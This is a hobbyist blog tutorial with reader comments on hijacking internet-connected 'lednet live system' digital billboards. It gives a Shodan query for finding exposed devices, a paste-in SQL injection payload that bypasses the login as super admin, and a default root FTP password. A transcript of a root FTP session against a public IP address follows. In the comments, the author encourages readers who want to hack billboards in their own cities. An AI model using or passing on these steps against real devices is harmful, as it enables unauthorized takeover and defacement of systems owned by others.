Hacking Digital Billboards

HACKED-BOARD

 

About a month ago a member of hack forums called Gangs posted a tutorial on how to hack digital billboards with a simple SQL injection, I thought it cant be that simple and tested it out myself, To my surprise, even in 2016 SQL injection is still a valid attack vector on sites connected to the internet, I’m guessing that’s why its still in the OWASP (Open Web Application Security Projects) Top 10.

Click this link to take you to the original post at hack forums http://hackforums.net/showthread.php?tid=5277277

First of all you need find some vulnerable billboards connected to the internet, to do this you need to create a free account at https://www.shodan.io/

Shodan is a search engine that lets the user find specific types of computers (Web Cams, routers, servers, etc.) connected to the internet using a variety of filters.

Once your registered at Shodan you can use the search feature to find our vulnerable billboards.

In the search box type title:”lednet live system” as pictured below

shoden led live system

 

 

and you should be presented with a list of results like this one in Egypt.

 

ledlivesite

When you click the link in Shodan it should take you directly to the site hosting the billboard system and you will be presented with a login.

ledlivelogin

So how to hack it? Well the Username Parameter is vulnerable to SQL Injection…

So to Login, paste in the username parameter…

-1558" OR 9005=9005 AND "UxGI"="UxGI

and anything in the password input. Now click login!

ledliveSQLI

 

Once logged in, take a look at the top right corner you should now be logged in as a Super Admin.

ledlivesuperadmin

From here you now have full access to the digital billboard and you can control everything from what shows on it, to changing all the display and power settings even enabling the built in WIFI and giving everyone free WIFI.

But wait that’s not all!!!!

There is another vulnerability in these billboards, which is a default root password vulnerability. You can basically get root FTP access to all of these billboards with the details below….

Username: root
Password: 111111

 

$ ftp 186.206.188.175
 Connected to 186.206.188.175.
 220 Welcome to blah FTP service.
 Name (186.206.188.175): root
 331 Please specify the password.
 Password:
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> cd /
 250 Directory successfully changed.ftp> passive
 Passive mode on.
 ftp> ls
 229 Entering Extended Passive Mode (|||41314|).
 150 Here comes the directory listing.
 drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
 drwxr-xr-x 7 0 0 0 May 21 18:08 dev
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
 drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
 drwxr-xr-x 1 0 0 36 Jan 01 1970 home
 drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
 lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
 drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
 drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
 dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
 drwxr-xr-x 1 0 0 116 Jan 01 1970 root
 drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
 drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
 drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
 drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
 drwxr-xr-x 3 0 0 672 Jan 01 1970 var
 drwxr-xr-x 4 0 0 288 Jan 01 1970 www
 226 Directory send OK.
 ftp>

You now have root access to the entire server.

I do think its poor show on the company that makes and sells this product to not have done proper security testing before going to market, which would have picked this up a simple SQL injection and even having a default root password on all your devices tut tut… but I bet there are different types of billboards with the same sort of issues.

 

9 thoughts on “Hacking Digital Billboards”

  1. Good evening! I have a problem with login and password. When I try to log in site creates the same window and I can’t change anything there. Can somebody help me?!

    1. Hi WinTor228 thanks for your comment, I have just had a quick look at this myself and can’t see any vulnerable systems still showing up in Shodan anymore. This vulnerability has probably been patched by now as this post was from back in 2016.

      Hemp

  2. Hey hemp,
    title:”lednet live system” is now showing “No results found”. My best guess is the problem has been rectified perhaps.

    Still it would be really cool if it could be done again and will be much appreciated if you could do some post on that again if possible.

    I want to try it atleast once in life time 😊😁

    Thanks.
    Budding Youth.

    1. Hi Budding Youth Thanks for your comment.

      This was just a simple SQL injection, you can find plenty of them using google dorks to all sorts of web portals.

      Check out my tutorial on SQL Injection Basics This should give you all the information you need to get started with SQL injection.

      Hemp.

  3. Suh, Hemp.
    Is there another way to hack billboards? since my city doesn’t have any lednet live billboards, or at least I didn’t find any while searching on shodan, 2 american ones and 1 russian one. I would LOVE to find one located in Riyadh, Saudi Arabia.

    Much thanks, learnin’ hacker

    1. Hi demtions

      Thanks for your comment, You are the first person to post a comment on my newly created Security Tutorials.

      As you stated the method above only works for Lednet live billboards and I am pretty sure has now been patched…

      But there are plenty of ways to hack other Digital Billboards. If you are still learning though, try and get your head around the basics first. In this case it was a simple SQL injection and default creds that allowed us to access the ftp taking control of the billboard.

      I would say start by taking a look at my tutorial on setting up a vulnerable LAMP server

      Then go through my SQL injection basics tutorial to understand why and how this attack worked.

      after you have the baiscs you need to understand what you are trying to hack, what type of device is it, how is it managed ( you would like to think there management would be locked down to a specific IP but they are not always ).

      I have even read that some of these billboards are managed by a PC in the billboard itself but you will need to find this out.

      if you were feeling practically brasen you could contact the manufacturer to get any technical information.

      leave me another comment if you want any more information or help.

      Hemp

Leave a Reply

Your email address will not be published. Required fields are marked *